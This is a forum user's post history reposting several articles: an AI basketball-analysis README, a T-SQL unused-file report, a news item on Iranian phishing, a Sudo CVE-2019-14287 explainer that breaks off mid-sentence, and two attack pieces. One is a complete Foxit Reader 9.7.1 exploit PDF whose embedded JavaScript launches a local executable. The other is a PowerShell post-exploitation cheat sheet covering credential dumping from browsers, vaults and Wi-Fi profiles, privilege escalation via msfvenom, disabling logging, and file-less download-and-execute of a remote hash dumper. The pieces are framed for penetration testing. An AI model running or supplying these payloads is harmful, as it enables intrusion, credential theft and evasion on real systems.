-
Posts
1026 -
Joined
-
Days Won
55
Everything posted by Kev
-
This is an artificial intelligence application built on the concept of object detection. Analyze basketball shots by digging into the data collected from object detection. We can get the result by simply uploading files to the web App, or submitting a POST request to the API. Please check the features below. There are more features coming up! Feel free to follow. All the data for the shooting pose analysis is calculated by implementing OpenPose. Please note that this is an implementation only for noncommercial research use only. Please read the LICENSE, which is exaclty same as the CMU's OpenPose License. If your are interested in the concept of human pose estimation, I have written a research paper summary of OpenPose. Check it out! Getting Started These instructions will get you a copy of the project up and running on your local machine. Get a copy Get a copy of this project by simply running the git clone command. git clone https://github.com/chonyy/AI-basketball-analysis.git Prerequisites Before running the project, we have to install all the dependencies from requirements.txt pip install -r requirements.txt Please note that you need a GPU with proper CUDA setup to run the video analysis, since a CUDA device is required to run OpenPose. Hosting Last, get the project hosted on your local machine with a single command. python app.py Alternatives This project is also hosted on Heroku. However, the heavy computation of TensorFlow may cause Timeout error and crash the app (especially for video analysis). Therefore, hosting the project on your local machine is more preferable. Please note that the shooting pose analysis won't be running on the Heroku hosted website, since a CUDA device is required to run OpenPose. Project Structure Features This project has three main features, shot analysis, shot detection, detection API. Shot and Pose analysis Shot counting Counting shooting attempts and missing, scoring shots from the input video. Detection keypoints in different colors have different meanings listed below: Blue: Detected basketball in normal status Purple: Undetermined shot Green: Shot went in Red: Miss Pose analysis Implementing OpenPose to calculate the angle of elbow and knee during shooting. Release angle and release time are calculated by all the data collected from shot analysis and pose analysis. Please note that there will be a relatively big error for the release time since it was calculated as the total time when the ball is in hand. Shot detection Detection will be shown on the image. The confidence and the coordinate of the detection will be listed below. Detection API Get the JSON response by submitting a POST request to (./detection_json) with "image" as KEY and input image as VALUE. Detection model The object detection model is trained with the Faster R-CNN model architecture, which includes pretrained weight on COCO dataset. Taking the configuration from the model architecture and train it on my own dataset. Future plans Host it on azure web app service. Improve the efficiency, making it executable on web app services. Download: AI-basketball-analysis-master.zip or git clone https://github.com/chonyy/AI-basketball-analysis.git Source
-
# Exploit Title: Foxit Reader 9.7.1 - Remote Command Execution (Javascript API) # Exploit Author: Nassim Asrir # Vendor Homepage: https://www.foxitsoftware.com/ # Description: Foxit Reader before 10.0 allows Remote Command Execution via the unsafe app.opencPDFWebPage JavaScript API which allows an attacker to execute local files on the file system and bypass the security dialog. The exploit process need the user-interaction (Opening the PDF) . + Process continuation #POC %PDF-1.4 %ÓôÌá 1 0 obj << /CreationDate(D:20200821171007+02'00') /Title(Hi, Can you see me ?) /Creator(AnonymousUser) >> endobj 2 0 obj << /Type/Catalog /Pages 3 0 R /Names << /JavaScript 10 0 R >> >> endobj 3 0 obj << /Type/Pages /Count 1 /Kids[4 0 R] >> endobj 4 0 obj << /Type/Page /MediaBox[0 0 595 842] /Parent 3 0 R /Contents 5 0 R /Resources << /ProcSet [/PDF/Text/ImageB/ImageC/ImageI] /ExtGState << /GS0 6 0 R >> /Font << /F0 8 0 R >> >> /Group << /CS/DeviceRGB /S/Transparency /I false /K false >> >> endobj 5 0 obj << /Length 94 /Filter/FlateDecode >> stream xœŠ»@@EûùŠ[RØk x•ÄüW"DDçëœâžÜœ›b°ý“{‡éTg†¼tS)dÛ‘±=dœþ+9Ÿ_ÄifÔÈŒ [ŽãB_5!d§ZhP>¯ ‰ endstream endobj 6 0 obj << /Type/ExtGState /ca 1 >> endobj 7 0 obj << /Type/FontDescriptor /Ascent 833 /CapHeight 592 /Descent -300 /Flags 32 /FontBBox[-192 -710 702 1221] /ItalicAngle 0 /StemV 0 /XHeight 443 /FontName/CourierNew,Bold >> endobj 8 0 obj << /Type/Font /Subtype/TrueType /BaseFont/CourierNew,Bold /Encoding/WinAnsiEncoding /FontDescriptor 7 0 R /FirstChar 0 /LastChar 255 /Widths[600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600] >> endobj 9 0 obj << /S/JavaScript /JS(app.opencPDFWebPage\('C:\\\\Windows\\\\System32\\\\calc.exe'\) ) >> endobj 10 0 obj << /Names[(EmbeddedJS)9 0 R] >> endobj xref 0 11 0000000000 65535 f 0000000015 00000 n 0000000170 00000 n 0000000250 00000 n 0000000305 00000 n 0000000560 00000 n 0000000724 00000 n 0000000767 00000 n 0000000953 00000 n 0000002137 00000 n 0000002235 00000 n trailer << /ID[<7018DE6859F23E419162D213F5C4D583><7018DE6859F23E419162D213F5C4D583>] /Info 1 0 R /Root 2 0 R /Size 11 >> startxref 2283 %%EOF Source exploit-db.com
-
- 1
-
In this article, I am going to show how we can automate the report of unused database files using T-SQL. Introduction Often organizations have a well-defined process to decommission the client database. I had helped one of the customers to establish the process of decommissioning the client database. Before decommissioning the client database, they want me to generate the backup of the customer database and detach the primary and secondary datafiles and transactional log files. I have created a SQL Server job to automate the entire process. In this process, there is a glitch. After decommissioning the database, the data files and log files are left unattended. Due to that, the disk drives start getting full. To fix this issue, we decided to create another SQL Job to generate the list of the unused database files and log files and email them to the stack holders. They verify the list of files and provide the approval to delete the files. I had created a stored procedure to identify the list of database files and log files that are not attached to any database and display the output in the HTML formatted table and email it using the database mail. The script performs the following tasks: Define temp tables to save the list of the drives and database files Use xp_fixeddrives to save the drive letter and free space in the #tbldrive table Use the dir command to get the list of all database files and store them in the #tblFiles table Compare the list of the files to the output of sys.master_files to get the physical files that are not in the database Create temp tables First, let us create a temp table named #tbldrive to save the list of the drives and free space in the drive and #tblFiles to insert the list of the physical location of files that has *.mdf, *.ndf, and *.ldf extensions. Following is the T-SQL query to create the tables: create table #tbldrive (ID INT IDENTITY(1,1), [DriveLetter] VARCHAR(1), [Free_Space] INT) Go create table #tblFiles (ID INT IDENTITY(1,1), [FilePath] NVARCHAR(max)) Go Insert drive letter details in temp table Run the following T-SQL query to insert the list of drives and free space in the #tbldrive table. INSERT INTO #tbldrive ([DriveLetter], [Free_Space]) EXEC xp_fixeddrives; Insert list of files in temp table To insert the list of the physical location of in temp table, we must create a dynamic T-SQL query that uses the drive letters stored in #tbldrive and create a dir command. In the dir command, we are going to use /S /B flags. The /S /B returns the full path of the files with *.mdf and *.ldf extensions. The following code generates the dir command. DECLARE @DriveLetter NVARCHAR(1); DECLARE @DriveCommand NVARCHAR(4000); DECLARE @i INT; WHILE ISNULL(@i, 0) > 0 BEGIN --get next available drive SET @DriveLetter = (SELECT [DriveLetter] FROM #tbldrive WHERE ID = @i); --create the command to get directory information SET @DriveCommand = N'dir ' + @DriveLetter + ':\*.*df /S/B'; --get directory information for the current drive select @DriveCommand SET @i = (SELECT [ID] + 1 FROM #tbldrive WHERE ID = @i); IF @i IS NULL SET @i = 0; END; Command Output: Now, as mentioned, we will insert the output of the command in #tblFiles. To do that, add the following T-SQL query block in the while loop. INSERT INTO #tblFiles ([FilePath]) EXEC xp_cmdshell @DriveCommand; The entire code block is as the following: set nocount on; DECLARE @DriveLetter NVARCHAR(1); DECLARE @DriveCommand NVARCHAR(4000); DECLARE @i INT; SET @i = 1; WHILE ISNULL(@i, 0) > 0 BEGIN --get next available drive SET @DriveLetter = (SELECT [DriveLetter] FROM #tbldrive WHERE ID = @i); --create the command to get directory information SET @DriveCommand = N'dir ' + @DriveLetter + ':\*.*df /S/B'; --get directory information for the current drive INSERT INTO #tblFiles ([FilePath]) EXEC xp_cmdshell @DriveCommand; SET @i = (SELECT [ID] + 1 FROM #tbldrive WHERE ID = @i); IF @i IS NULL SET @i = 0; END; select FilePath from #tblFiles drop table #tbldrive drop table #tblFiles Output of the list of physical location of the mdf and ldf file are the following: Compare the list with an output of sys.master_files Now, we will compare the list of the physical locations in #tblfile with the list of the values of the physical_name column in the sys.master_files DMV. Following is the code: select FilePath from #tblFiles where FilePath not in (select physical_name from sys.master_files) and FilePath not like 'C:\%' and (FilePath like '%mdf' OR FilePath like '%ndf' OR FilePath like '%ldf' ) The output is the following: Now, to display the output in email, we will use HTML code. The HTML code the table will be stored in the @HTMLTable variable. The data type of the variable is nvarchar(max). Following is the code: SET @UnusedDatabaseFiles = '<table id="AutoNumber1" style="BORDER-COLLAPSE: collapse" borderColor="#111111" height="40" cellSpacing="0" cellPadding="0" width="50%" border="1"> <tr> <td width="27%" bgColor="#D3D3D3" height="15"><b> <font face="Verdana" size="1" color="#FFFFFF">Database Files </font></b></td> </tr> <p style="margin-top: 1; margin-bottom: 0"> </p> <p><font face="Verdana" size="4">List of unused database files</font></p>' SELECT @UnusedDatabaseFiles = @UnusedDatabaseFiles + '<tr><td><font face="Verdana" size="1">' + CONVERT(VARCHAR, filepath) + '</font></td></tr>' FROM #tblfiles WHERE filepath NOT IN (SELECT physical_name FROM sys.master_files) AND filepath NOT LIKE 'C:\%' AND ( filepath LIKE '%mdf' OR filepath LIKE '%ndf' OR filepath LIKE '%ldf' ) To send the email, we will use the SQL Server database mail. I have already created a database mail profile named OutlookMail. The code to email the list of unused database files is as following: EXEC msdb.dbo.sp_send_dbmail @profile_name = 'yourmailprofile', @recipients='n******87@outlook.com', @subject = 'List of unused database files', @body = @UnusedDatabaseFiles, @body_format = 'HTML' ; Create a SQL Server Agent Job Once the stored procedure is created, we will use the SQL Server Agent job to automate it. For that, Open SQL Server Management studio Expand SQL Server Instance Expand SQL Server Agent Right-click on Jobs Select New Job. On the New Job dialog box, provide the desired name of the SQL job in Jab Name text box. Click on Steps and click on New to create a job step. In the New Job Step dialog box, choose Transact-SQL from the Type drop-down box and enter the following T-SQL code in command textbox. Use DBA GO Exec sp_getunuseddatabases Click OK to save the step and close the dialog box. We will schedule the execution of this job every week on Monday at 9:00 AM; therefore, configure the schedule accordingly. To do that, click on Schedules in the New Job dialog box. On the New Schedule dialog box, enter the desired schedule name in Name textbox choose weekly from the occurs drop-down box click on Monday checkbox enter 09:00:00 in Occurs once at the textbox. See the following screenshot Click OK to save the schedule and close the New Job Schedule dialog box. Click OK to save the SQL Job. Now let us test the SQL job. To do that, right-click on the SQL job and click ok Run job at step. Once the job completes the execution, you will receive the email, as shown below. Summary In this article, I have shown a T-SQL Script that is used to generate a list of unused database data files and log files. Moreover, I have also explained how we can display the list of the files in an HTML formatted table and automate the report using SQL Server Agent Job. Source sqlshack.com
-
Caut programator pentru Soft de proiectare a schelelor metalice
Kev replied to donaty33's topic in Locuri de munca
https://www.ekscaffolddesign.com/2D-SCAFFOLD-DESIGN-DRAWINGS-AND-CALCULATIONS.html -
NATO Secretary General Jens Stoltenberg addresses the Munich Security Conference in 2015. (NATO / Flickr) Iranian government-linked hackers have been sending spearphishing emails to large swaths of high-profile potential attendees of the upcoming Munich Security Conference as well as the Think 20 Summit in Saudi Arabia, according to Microsoft research. The Iranian attackers, known as Phosphorous, have disguised themselves as conference organizers and have sent fake invitations containing PDF documents with malicious links to over 100 possible invitees of the conferences, both of which are prominent summits dedicated to international security and policies of the world’s largest economies, respectively. In some cases the attackers have been successful in guiding some victims to those links, which lead victims to credential-harvesting pages, Tom Burt, corporate vice president of Microsoft Security and Trust announced in a blog published Wednesday morning. Microsoft did not say what information, if any, the attackers successful stole from victims. It was just the latest example of Phosphorous targeting non-governmental entities — the group has been known to target journalists and researchers who focus on Iran in the past, for instance. The hackers typically also go after entities in the military, energy, business services, and telecommunications sectors throughout the U.S. and the Middle East, according to previous FireEye research. The Iranian government-linked hackers tend to conduct long-term strategic intelligence gathering, according to FireEye. Although Microsoft is releasing the information on the threat to Munich Security Conference attendees in close proximity to the U.S. presidential elections, Microsoft researchers do not believe this specific campaign is linked with the election. But the same hackers behind this operation, also known as APT35 or Charming Kitten, have targeted associates of President Donald Trump’s reelection campaign before, according to previous Microsoft and Google research. In recent months the hackers have targeted the Trump campaign, according to research Microsoft published last month and Google research published in June. The same group was targeting journalists and the email accounts of people associated with the Trump campaign one year ago as well. Via cyberscoop.com
-
This article contains a list of PowerShell commands collected from various corners of the Internet which could be helpful during penetration tests or red team exercises. The list includes various post-exploitation one-liners in pure PowerShell without requiring any offensive (= potentially flagged as malicious) 3rd party modules, but also a bunch of handy administrative commands. Let’s get to it! Table Of Contents Locating files with sensitive information Find potentially interesting files Find credentials in Sysprep or Unattend files Find configuration files containing “password” string Find database credentials in configuration files Locate web server configuration files Extracting credentials Get stored passwords from Windows PasswordVault Get stored passwords from Windows Credential Manager Dump passwords from Google Chrome browser Get stored Wi-Fi passwords from Wireless Profiles Search for SNMP community string in registry Search for string pattern in registry Privilege escalation Search registry for auto-logon credentials Check if AlwaysInstallElevated is enabled Find unquoted service paths Check for LSASS WDigest caching Credentials in SYSVOL and Group Policy Preferences (GPP) Network related commands Set MAC address from command-line Allow Remote Desktop connections Host discovery using mass DNS reverse lookup Port scan a host for interesting ports Port scan a network for a single port (port-sweep) Create a guest SMB shared drive Whitelist an IP address in Windows firewall Other useful commands File-less download and execute Get SID of the current user Check if we are running with elevated (admin) privileges Disable PowerShell command logging List installed antivirus (AV) products Conclusion Locating files with sensitive information The following PowerShell commands can be handy during post-exploitation phase for locating files on disk that may contain credentials, configuration details and other sensitive information. Find potentially interesting files With this command we can identify files with potentially sensitive data such as account information, credentials, configuration files etc. based on their filename: gci c:\ -Include *pass*.txt,*pass*.xml,*pass*.ini,*pass*.xlsx,*cred*,*vnc*,*.config*,*accounts* -File -Recurse -EA SilentlyContinue Although this can produce a lot of noise, it can also yield some very interesting results. Recommended to do this for every disk drive, but you can also just run it on the c:\users folder for some quick wins. Find credentials in Sysprep or Unattend files This command will look for remnants from automated installation and auto-configuration, which could potentially contain plaintext passwords or base64 encoded passwords: gci c:\ -Include *sysprep.inf,*sysprep.xml,*sysprep.txt,*unattended.xml,*unattend.xml,*unattend.txt -File -Recurse -EA SilentlyContinue This is one of the well known privilege escalation techniques, as the password is typically local administrator password. Recommended to do this for every disk drive. Find configuration files containing “password” string With this command we can locate files containing a certain pattern, e.g. here were are looking for a “password” pattern in various textual configuration files: gci c:\ -Include *.txt,*.xml,*.config,*.conf,*.cfg,*.ini -File -Recurse -EA SilentlyContinue | Select-String -Pattern "password" Although this can produce a lot of noise, it could also yield some interesting results as well. Recommended to do this for every disk drive. Find database credentials in configuration files Using the following PowerShell command we can find database connection strings (with plaintext credentials) stored in various configuration files such as web.config for ASP.NET configuration, in Visual Studio project files etc.: gci c:\ -Include *.config,*.conf,*.xml -File -Recurse -EA SilentlyContinue | Select-String -Pattern "connectionString" Finding connection strings e.g. for a remote Microsoft SQL Server could lead to a Remote Command Execution (RCE) using the xp_cmdshell functionality (link, link, link etc.) and consequent lateral movement. Locate web server configuration files With this command, we can easily find configuration files belonging to Microsoft IIS, XAMPP, Apache, PHP or MySQL installation: gci c:\ -Include web.config,applicationHost.config,php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -EA SilentlyContinue These files may contain plain text passwords or other interesting information which could allow accessing other resources such as databases, administrative interfaces etc. Go back to top. Extracting credentials The following PowerShell commands also fall under the post-exploitation category and they can be useful for extracting credentials after gaining access to a Windows system. Get stored passwords from Windows PasswordVault Using the following PowerShell command we can extract secrets from the Windows PasswordVault, which is a Windows built-in mechanism for storing passwords and web credentials e.g. for Internet Explorer, Edge and other applications: [Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $_.RetrievePassword();$_ } Note that the vault is typically stored in the following locations and it is only possible to retrieve the secrets under the context of the currently logged user: C:\Users\<USERNAME>\AppData\Local\Microsoft\Vault\ C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault\ C:\ProgramData\Microsoft\Vault\ More information about Windows PasswordVault can be found here. Get stored passwords from Windows Credential Manager Windows Credential Manager provides another mechanism of storing credentials for signing in to websites, logging to remote systems and various applications and it also provides a secure way of using credentials in PowerShell scripts. With the following one-liner, we can retrieve all stored credentials from the Credential Manager using the CredentialManager PowerShell module: Get-StoredCredential | % { write-host -NoNewLine $_.username; write-host -NoNewLine ":" ; $p = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($_.password) ; [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($p); } Similarly to PasswordVault, the credentials are stored in individual user profile locations and only the currently logged user can decrypt theirs: C:\Users\<USERNAME>\AppData\Local\Microsoft\Credentials\ C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Credentials\ C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\ Dump passwords from Google Chrome browser The following command extracts stored credentials from the Google Chrome browser, if is installed and if there are any passwords stored: [System.Text.Encoding]::UTF8.GetString([System.Security.Cryptography.ProtectedData]::Unprotect($datarow.password_value,$null,[System.Security.Cryptography.DataProtectionScope]::CurrentUser)) Similarly, this has to be executed under the context of the target (victim) user. Get stored Wi-Fi passwords from Wireless Profiles With this command we can extract all stored Wi-Fi passwords (WEP, WPA PSK, WPA2 PSK etc.) from the wireless profiles that are configured in the Windows system: (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize Note that we have to have administrative privileges in order for this to work. Search for SNMP community string in registry The following command will extract SNMP community string stored in the registry, if there is any: gci HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse -EA SilentlyContinue Finding a SNMP community string is not a critical issue, but it could be useful to: Understand what kind of password patterns are used among sysadmins in the organization Perform password spraying attack (assuming that passwords might be re-used elsewhere) Search for string pattern in registry The following PowerShell command will sift through the selected registry hives (HKCR, HKCU, HKLM, HKU, and HKCC) and recursively search for any chosen pattern within the registry key names or data values. In this case we are searching for the “password” pattern: $pattern = "password" $hives = "HKEY_CLASSES_ROOT","HKEY_CURRENT_USER","HKEY_LOCAL_MACHINE","HKEY_USERS","HKEY_CURRENT_CONFIG" # Search in registry keys foreach ($r in $hives) { gci "registry::${r}\" -rec -ea SilentlyContinue | sls "$pattern" } # Search in registry values foreach ($r in $hives) { gci "registry::${r}\" -rec -ea SilentlyContinue | % { if((gp $_.PsPath -ea SilentlyContinue) -match "$pattern") { $_.PsPath; $_ | out-string -stream | sls "$pattern" }}} Although this could take a lot of time and produce a lot of noise, it will certainly find every occurrence of the chosen pattern in the registry. Privilege escalation The following sections contain PowerShell commands useful for privilege escalation attacks – for cases when we only have a low privileged user access and we want to escalate our privileges to local administrator. Search registry for auto-logon credentials Windows systems can be configured to auto login upon boot, which is for example used on POS (point of sale) systems. Typically, this is configured by storing the username and password in a specific Winlogon registry location, in clear text. The following command will get the auto-login credentials from the registry: gp 'HKLM:\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon' | select "Default*" Check if AlwaysInstallElevated is enabled If the following AlwaysInstallElevated registry keys are set to 1, it means that any low privileged user can install *.msi files with NT AUTHORITY\SYSTEM privileges. Here’s how to check it with PowerShell: gp 'HKCU:\Software\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated gp 'HKLM:\Software\Policies\Microsoft\Windows\Installer' -Name AlwaysInstallElevated Note that both registry keys have to be set to 1 in order for this to work. An MSI installer package can be easily generated using msfvenom utility from Metasploit Framework. For instance, we can add ourselves into the administrators group: msfvenom -p windows/exec CMD='net localgroup administrators joe /add' -f msi > pkg.msi Find unquoted service paths The following PowerShell command will print out services whose executable path is not enclosed within quotes (“): gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name This can lead to privilege escalation in case the executable path also contains spaces and we have write permissions to any of the folders in the path. More details about this technique including exploitation steps can be found here or here. Check for LSASS WDigest caching Using the following command we can check whether the WDigest credential caching is enabled on the system or not. This settings dictates whether we will be able to use Mimikatz to extract plaintext credentials from the LSASS process memory. (gp registry::HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest).UseLogonCredential If the value is set to 0, then the caching is disabled (the system is protected) If it doesn’t exist or if it is set to 1, then the caching is enabled Note: that if it is disabled, we can still enable it using the following command, but we will also have to restart the system afterwards: sp registry::HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest -name UseLogonCredential -value 1 Credentials in SYSVOL and Group Policy Preferences (GPP) In corporate Windows Active Directory environments, credentials can be sometimes found stored in the Group Policies, in various custom scripts or configuration files on the domain controllers in the SYSVOL network shares. Since the SYSVOL network shares are accessible to any authenticated domain user, we can easily identify if there are any stored credentials using the following command: Push-Location \\example.com\sysvol gci * -Include *.xml,*.txt,*.bat,*.ps1,*.psm,*.psd -Recurse -EA SilentlyContinue | select-string password Pop-Location One typical example is MS14-025 with cPassword attribute in the GPP XML files. The “cpassword” attribute can be instantly decrypted into a plaintext form e.g. by using gpp-decrypt utility in Kali Linux. Network related commands Here is a few network related PowerShell commands that can be useful particularly during internal network penetration tests and similar exercises. Set MAC address from command-line Sometimes it can be useful to set MAC address on a network interface and with PowerShell we can easily do it without using any 3rd party utility: Set-NetAdapter -Name "Ethernet0" -MacAddress "00-01-18-57-1B-0D" This can be useful e.g. when we are testing for NAC (network access control) bypass and other things. Allow Remote Desktop connections This command trio can be useful when we want to connect to the system using graphical RDP session, but it is not enabled for some reason: # Allow RDP connections (Get-WmiObject -Class "Win32_TerminalServiceSetting" -Namespace root\cimv2\terminalservices).SetAllowTsConnections(1) # Disable NLA (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0) # Allow RDP on the firewall Get-NetFirewallRule -DisplayGroup "Remote Desktop" | Set-NetFirewallRule -Enabled True Now the port tcp/3389 should be open and we should be able to connect without a problem e.g. by using xfreerdp or rdesktop tools from Kali Linux. Host discovery using mass DNS reverse lookup Using this command we can perform quick reverse DNS lookup on the 10.10.1.0/24 subnet and see if there are any resolvable (potentially alive) hosts: $net = "10.10.1." 0..255 | foreach {$r=(Resolve-DNSname -ErrorAction SilentlyContinue $net$_ | ft NameHost -HideTableHeaders | Out-String).trim().replace("\s+","").replace("`r","").replace("`n"," "); Write-Output "$net$_ $r"} | tee ip_hostname.txt The results will be then saved in the ip_hostname.txt file in the current working directory. Sometimes this can be faster and more covert than a pingsweep or similar techniques. Port scan a host for interesting ports Here’s how to quickly port scan a specified IP address (10.10.15.232) for selected 39 interesting ports: $ports = "21 22 23 25 53 80 88 111 139 389 443 445 873 1099 1433 1521 1723 2049 2100 2121 3299 3306 3389 3632 4369 5038 5060 5432 5555 5900 5985 6000 6379 6667 8000 8080 8443 9200 27017" $ip = "10.10.15.232" $ports.split(" ") | % {echo ((new-object Net.Sockets.TcpClient).Connect($ip,$_)) "Port $_ is open on $ip"} 2>$null This will give us a quick situational awareness about a particular host on the network using nothing but a pure PowerShell: Port scan a network for a single port (port-sweep) This could be useful for example for quickly discovering SSH interfaces (port tcp/22) on a specified network Class C subnet (10.10.0.0/24): $port = 22 $net = "10.10.0." 0..255 | foreach { echo ((new-object Net.Sockets.TcpClient).Connect($net+$_,$port)) "Port $port is open on $net$_"} 2>$null If you are trying to identify just Windows systems, just change the port to 445. Create a guest SMB shared drive Here’s a cool trick to quickly start a SMB (CIFS) network shared drive accessible by anyone: new-item "c:\users\public\share" -itemtype directory New-SmbShare -Name "sharedir" -Path "C:\users\public\share" -FullAccess "Everyone","Guests","Anonymous Logon" To stop it afterwards, execute: Remove-SmbShare -Name "sharedir" -Force This could come handy for transferring files, exfiltration etc. Whitelist an IP address in Windows firewall Here’s a useful command to whitelist an IP address in the Windows firewall: New-NetFirewallRule -Action Allow -DisplayName "pentest" -RemoteAddress 10.10.15.123 Now we should be able to connect to this host from our IP address (10.10.15.123) on every port. After we are done with our business, remove the rule: Remove-NetFirewallRule -DisplayName "pentest" Other useful commands The following commands can be useful for performing various administrative tasks, for gathering information about the system or using additional PowerShell functionalities that can be useful during a pentest. File-less download and execute Using this tiny PowerShell command we can easily download and execute arbitrary PowerShell code that is hosted remotely – either on our own machine or on the Internet: iex(iwr("https://URL")) iwr = Invoke-WebRequest iex = Invoke-Expression The remote content will be downloaded and loaded without touching the disk (file-less). Now we can just run it. We can use this for any number of popular offensive modules, e.g.: https://github.com/samratashok/nishang https://github.com/PowerShellMafia/PowerSploit https://github.com/FuzzySecurity/PowerShell-Suite https://github.com/EmpireProject/Empire (modules here) Here’s an example of dumping local password hashes (hashdump) using nishang Get-PassHashes module: iex(iwr("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1"));Get-PassHashes Very easy, but note that this will be likely flagged by any decent AV or EDR. What you could do in cases like this is that you could obfuscate the modules that you want to use and host them somewhere on your own. Get SID of the current user The following command will return SID value of the current user: ([System.Security.Principal.WindowsIdentity]::GetCurrent()).User.Value Check if we are running with elevated (admin) privileges Here’s a quick one-liner for checking whether we are running elevated PowerShell session with Administrator privileges: If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { echo "yes"; } else { echo "no"; } Disable PowerShell command logging By default, PowerShell automatically logs up to 4096 commands in the history file, similarly as Bash does on Linux. The PowerShell history file is a plaintext file located in each users’ profile in the following location: C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt With the following command(s) we can disable the PowerShell command logging functionality in the current shell session: Set-PSReadlineOption –HistorySaveStyle SaveNothing or Remove-Module PSReadline This can be useful in red team exercises if we want to minimize our footprint on the system. From now on, no command will be recorded in the PowerShell history file. Note however that the above command(s) will still be echoed in the history file, so be aware that this is not completely covert. List installed antivirus (AV) products Here’s a simple PowerShell command to query Security Center and identify all installed Antivirus products on this computer: Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct By decoding the productState value, we can identify which AV is currently enabled (in case there is more than one installed), whether the signatures are up-to-date and even which AV features and scanning engines are enabled (e.g. real-time protection, anti-spyware, auto-update etc.). This is however quite an esoteric topic without a simple solution. Here are some links on the topic: https://mspscripts.com/get-installed-antivirus-information-2/ https://jdhitsolutions.com/blog/powershell/5187/get-antivirus-product-status-with-powershell/ https://stackoverflow.com/questions/4700897/wmi-security-center-productstate-clarification/4711211 https://docs.microsoft.com/en-us/windows/win32/api/iwscapi/ne-iwscapi-wsc_security_product_state https://social.msdn.microsoft.com/Forums/pt-BR/6501b87e-dda4-4838-93c3-244daa355d7c/wmisecuritycenter2-productstate Conclusion Hope you will find this collection useful during your pentests sometimes. Please leave a comment with YOUR favorite one-liner. For other interesting commands, check out our pure PowerShell infosec reference or have a look on our collection of minimalistic offensive security tools on github. Source: infosecmatter.com
-
- 1
-
Caut programator pentru Soft de proiectare a schelelor metalice
Kev replied to donaty33's topic in Locuri de munca
Lasa-mi pm cu date de contact, cunosc pe cineva -
Over the past few days, news of CVE-2019-14287 — a newly discovered open source vulnerability in Sudo, Linux’s popular command tool has been grabbing quite a few headlines. Since vulnerabilities in widespread and established open source projects can often cause a stir, we decided to present you with a quick cheat sheet to let you know exactly what the fuss is about. Here is everything you need to know about the Sudo vulnerability, how it works, and how to handle the vulnerable Sudo component, if you find that you are currently at risk. Why Is The New Sudo Security Vulnerability (CVE-2019-14287) Making Waves? Let’s start with the basics. Sudo is a program dedicated to the Linux operating system, or any other Unix-like operating system, and is used to delegate privileges. For example, it can be used by a local user who wants to run commands as root — the windows equivalent of admin user. On October 14, the Sudo team published a security alert about CVE-2019-14287, a new security issue discovered by Joe Vennix of Apple Information Security, in all Sudo versions prior to version 1.8.28. The security flaw could enable a malicious user to execute arbitrary commands as root user even in cases where the root access is disallowed. Considering how widespread Sudo usage is among Linux users, it’s no surprise that everybody’s talking about the security vulnerability. The Sudo Vulnerability Explained That’s the scary version, and when we think about how powerful and popular Sudo is, CVE-2019-14287 should not be ignored. That said, it’s also important to note that the vulnerability is relevant in a specific configuration in the Sudo security policy, called “sudoers”, which helps ensure that privileges are limited only to specific users. The issue occurs when a sysadmin inserts an entry into the sudoers file, for example: jacob myhost = (ALL, !root) /usr/bin/chmod This entry means that user jacob is allowed to run “chmod” as any user except the root user, meaning a security policy is in place in order to limit access — sounds good, right? Unfortunately, Joe Vennix from Apple Information Security found that the function fails to parse all values correctly and when giving the parameter user id “-1” or its unsigned number “4294967295”, the command will run as root, bypassing the security policy entry we set in the example above. In the example below, when we run the “-1” user ID, we get the id number “0” which is the root user value: Stay Secure: Keep Calm And Update Your Sudo Version And now for some good news: the Sudo team has already released a secure version, so If you are using this particular security configuration, make sure to update to version 1.8.28 or over. In addition, as you can see, the Sudo vulnerability only occurs in a very specific configuration. As is often the case when newly disclosed security vulnerabilities in popular open source projects make a splash, there’s no need to panic. While Sudo is an extremely popular and widely used project, the vulnerability is only relevant in a specific scenario, and it has already been 